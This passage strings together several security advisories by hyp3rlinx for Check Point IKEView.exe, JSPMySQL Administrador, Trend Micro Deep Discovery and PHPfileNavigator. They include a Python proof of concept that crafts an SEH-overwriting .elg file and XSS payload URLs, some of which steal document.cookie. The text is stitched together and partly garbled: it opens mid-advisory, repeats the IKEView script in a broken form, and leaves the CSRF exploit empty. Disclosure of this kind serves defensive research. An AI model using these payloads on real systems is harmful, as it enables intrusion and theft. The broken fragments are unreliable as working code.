in IKEView.exe and KABM!

seh="B"*4 #<--will overwrite SEH with bunch of 42's HEX for 'B' ASCII 
char.

file="C:\\IKEView-buffer-overflow.elg"
x=open(file,"w")
payload="A"*4428+seh
x.write(payload)
x.close()

print "\n===\n"
print " IKEView-buffer-overflow.elg file created\n"
print " hyp3rlinx ..."
print "=\n"



Exploitation Technique:
===
Local



Severity Level:
=
High



Description:
==


Vulnerable Product: [+] IKEView.exe Feature Pack NGX R60 - Build 
59104


Vulnerable File Type:   [+] .elg


Affected Area(s):   [+] Local OS


===

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and that due credit is given. 
Permission is explicitly given for insertion in vulnerability databases and 
similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained 
herein and prohibits any malicious use of all security related information or 
exploits by the author or elsewhere.

by hyp3rlinx

IKEView.exe Fox beta 1 Stack Buffer Overflow

[apparitionsec]

[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  http://hyp3rlinx.altervista.org/advisories/AS-CP_IKEVIEW-0911.txt



Vendor:

www.checkpoint.com



Product:

IKEView.exe Fox beta 1

IKEVIew.EXE is used to inspect - internet private key exchanges on the Firewall 
phase(1 & 2) packets being exchanged with switches and gateways.



Vulnerability Type:
==
Stack Buffer Overflow



CVE Reference:
==
N/A



Vulnerability Details:
=
IKEView.exe is vulnerable to local stack based buffer overflow when parsing an 
malicious (internet key exchange) ".elg" file.
Vulnerability causes nSEH & SEH pointer overwrites at 4448 bytes after IKEView 
parses our malicious file, which may result then
result in arbitrary attacker supplied code execution.


quick GDB register dump: 


EAX  
ECX 41414141 
EDX 7774B4AD ntdll.7774B4AD 
EBX  
ESP 0018E0E0 
EBP 0018E100 
ESI  
EDI  
EIP 41414141 
C 0 ES 002B 32bit 0() 
P 1 CS 0023 32bit 0() 
A 0 SS 002B 32bit 0() 
Z 1 DS 002B 32bit 0() 
S 0 FS 0053 32bit 7EFDD000(FFF) 
T 0 GS 002B 32bit 0() 
D 0 
O 0 LastErr ERROR_SUCCESS ()

---SEH Chain-

0:000> !exchain
0018f870: 42424242
Invalid exception stack at 41414141
0:000> 
0018f870: 42424242
Invalid exception stack at 41414141
0:000> 

0018F868  |02004AE0  àJ.  ASCII "File loaded in 08 minutes, 01 seconds."
0018F86C  |41414141  
0018F870  |41414141    Pointer to next SEH record
0018F874  |42424242    SE handler


Quick Buffer Overflow POC :
===


1) Below python file to create POC save as .py it will generate POC file, open 
in IKEView.exe and KABM!

seh="B"*4 #<--will overwrite SEH with bunch of 42's HEX for 'B' ASCII 
char.

file="C:\\IKEView-buffer-overflow.elg"
x=open(file,"w")
payload="A"*+seh 
x.write(payload)
x.close()

print "\n===\n"
print " IKEView-buffer-overflow.elg file created\n"
print " hyp3rlinx ..."
print "=\n"



Exploitation Technique:
===
Local



Severity Level:
=
High



Description:
==


Vulnerable Product: [+] IKEView.exe Fox beta 1


Vulnerable File Type:   [+] .elg


Affected Area(s):   [+] Local OS


===

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and that due credit is given. 
Permission is explicitly given for insertion in vulnerability databases and 
similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained 
herein and prohibits any malicious use of all security related information or 
exploits by the author or elsewhere.

by hyp3rlinx

JSPMySQL Administrador CSRF & XSS Vulnerabilities

[apparitionsec]

[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/AS-JSPMYSQLADMINISTRADOR-0904.txt



Vendor:

JSPMySQL Administrador
https://sites.google.com/site/mfpledon/producao-de-software



Product:

JSPMySQL Administrador v.1 is a remote administration of MySQL databases 
that are on a Web server using JSP technology


Vulnerability Type:
===
CSRF & XSS 



CVE Reference:
==
N/A




Vulnerability Details:
=

1) No CSRF token exists allowing remote attackers to run arbitrary SQL commands
on the MySQL database. 

2) XSS entry point exists on the listaBD2.jsp web page opening up the 
application
for client side browser code execution.

In either case get victim to visit our malicious webpage or click on our
malicious linx then KABOOM!!!




Exploit code(s):
===

1- CSRF to drop the default MySQL database on the remote server:





JSP-MYSQL-ADMIN-CSRF

Trend Micro Deep Discovery Authentication Bypass

[apparitionsec]

[+] Credits: John Page aka hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  http://hyp3rlinx.altervista.org/advisories/TREND-MICRO-DDI-0818.txt



Vendor:

www.trendmicro.com



Product:
===
Trend Micro Deep Discovery 3.7.1096



Vulnerability Type:
===
Authentication Bypass


CVE Reference:
==
CVE-2015-2873




Vulnerability Details:
===
http://esupport.trendmicro.com/solution/en-US/1112206.aspx

http://www.kb.cert.org/vuls/id/248692

Trend Micro Deep Discovery Threat Appliance version 3.7.1096 
Certain Deep Discovery Inspector URLs including the system log and
whitelist/blacklist are accessible to a non-administrator user 
because the pages do not properly check for authorization. An 
unauthenticated user without administrator privileges may thus 
gain access to and modify certain system configuration settings.

Several URLs, including the system log, whitelist, and blacklist, 
are accessible to a non-administrator user by direct request.
The pages do not properly check for authorization.



Impact:
===
An authenticated user without administrator privileges may access
and modify certain system configuration settings.



Exploit code(s):
===
N/A




Disclosure Timeline:
=
Vendor Notification:  March 26, 2015
August 18, 2015 : Public Disclosure





Severity Level:
=
High



Description:
==


Request Method(s):  [+] GET


Vulnerable Product: [+] Trend Micro Deep Discovery 3.7.1096


Vulnerable Parameter(s):[+] syslog, whitelist, blacklist


Affected Area(s):   [+] Trend Micro Deep Discovery


===

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and that due credit is given. 
Permission is explicitly given for insertion in vulnerability databases and 
similar, provided that due credit is given to the author. The author is not 
responsible for any misuse of the information contained herein and prohibits 
any malicious use of all security related information or exploits by the author 
or elsewhere.

by hyp3rlinx

Trend Micro Deep Discovery XSS

[apparitionsec]

[+] Credits: John Page aka hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/TREND-MICRO-DDI-081815b.txt



Vendor:

www.trendmicro.com



Product:
==
Trend Micro Deep Discovery 3.7.1096

The Trend Micro Deep Discovery platform enables you to detect, 
analyze, and respond to today’s stealthy, targeted attacks 
in real time. It may be deployed on a network as an appliance.



Vulnerability Type:
==
Cross Site Scripting (XSS)



CVE Reference:
==
CVE-2015-2872




Vulnerability Details:
==
http://esupport.trendmicro.com/solution/en-US/1112206.aspx

http://www.kb.cert.org/vuls/id/248692

Deep Discovery Inspector is vulnerable to XSS attacks that
could allow an unauthenticated user to execute malicious content.

On some legacy browsers like IE 7 with a low Security Level,
Deep Discovery Inspector is vulnerable to XSS that allows an
unauthenticated user to execute malicious content through the index.php
The widget implementation is vulnerable to XSS that allows an
unauthenticated user to execute malicious content.




Exploit code(s):
===
https://localhost/widget/index.php?menuUrl=1contentUrl='%25;alert('XSS+By+hyp3rlinx+\nMarch+2015')//




Disclosure Timeline:
=
Vendor Notification:  March 26, 2015
August 18, 2015 : Public Disclosure




Exploitation Technique:
===
Remote



Severity Level:
=
Medium



Description:
==


Request Method(s):  [+] GET


Vulnerable Product: [+] Trend Micro Deep Discovery 3.7.1096


Vulnerable Parameter(s):[+] contentURL


Affected Area(s):   [+] Trend Micro Deep Discovery


===

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and that due credit is given. 
Permission is explicitly given for insertion in vulnerability databases and 
similar, provided that due credit is given to the author. The author is not 
responsible for any misuse of the information contained herein and prohibits 
any malicious use of all security related information or exploits by the author 
or elsewhere.

by hyp3rlinx

PHPfileNavigator 2.3.3 Persistent Reflected XSS

[apparitionsec]

[+] Credits: John Page aka hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/AS-PHPFILENAVIGATOR0812c.txt



Vendor:

pfn.sourceforge.net



Product:
===
PHPfileNavigator v2.3.3 (pfn)

Is state-of-the-art, open source web based application
to complete manage your files and folders.



Vulnerability Type:
=
Persistent  Reflected XSS



CVE Reference:
==
N/A




Vulnerability Details:
=
Multiple persistent XSS vulnerable fields exist on the 'Modify User' form.
nome, usuario, email etc... 

We can leverage existing CSRF vulnerability to update a victimz profile and 
store malicious
XSS payload or an malicious user can inject there own payloads when updating 
thier profilez
affecting other users and the security of the whole application.

Multiple reflected XSS exists as well for following PHP pages all with same 
vulnerable
parameter 'dir' when issuing GET requests.

pfn-2.3.3 application seems to filter out script tags etc, but we can bypass 
this using
DIV onMouseMove= JS functions!.

navega.php

accion.php

preferencias.php


Tested using xampp-1.7.0


Exploit code(s):
===

Persistent XSS:
---

POST URL:
http://localhost/PHPfileNavigator/pfn-2.3.3/xestion/usuarios/index.php?PHPSESSID=

e.g.

Inject scriptalert(666)/script into the 'Name*', 'User*' or 'Email' field
and click Accept button.

Injecting XSS into 'name' field will store the XSS payload in the pfn MySQL 
database
in 'pfn_usuarios' table called 'nome' in the 'nome' column. The Same fate will 
happen for
other injected fields 'email  'usuario'.


Reflected XSS:
--

1)
http://localhost/PHPfileNavigator/pfn-2.3.3/navega.php?PHPSESSID=HELLdir=  
DIV  onMouseMove= alert(document.cookie)  /a

2)
http://localhost/PHPfileNavigator/pfn-2.3.3/accion.php?accion=buscadorPHPSESSID=HELLdir=
  DIV  onMouseMove= alert(document.cookie)  /a

3)
http://localhost/PHPfileNavigator/pfn-2.3.3/preferencias.php?PHPSESSID=HELLdir=
  DIV  onMouseMove= alert(document.cookie)  /a



Disclosure Timeline:
=
Vendor Notification: August 8, 2015
August 12, 2015 : Public Disclosure



Severity Level:
=
Medium



Description:
==


Request Method(s):  [+] POST / GET


Vulnerable Product: [+] PHPfileNavigator v2.3.3 (pfn)


Vulnerable Parameter(s):[+] nome, usuario, email, dir


Affected Area(s):   [+] Admin


===

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and that due credit is given. 
Permission is explicitly given for insertion in vulnerability databases and 
similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained 
herein and prohibits any malicious use of all security related information or 
exploits by the author or elsewhere.

by hyp3rlinx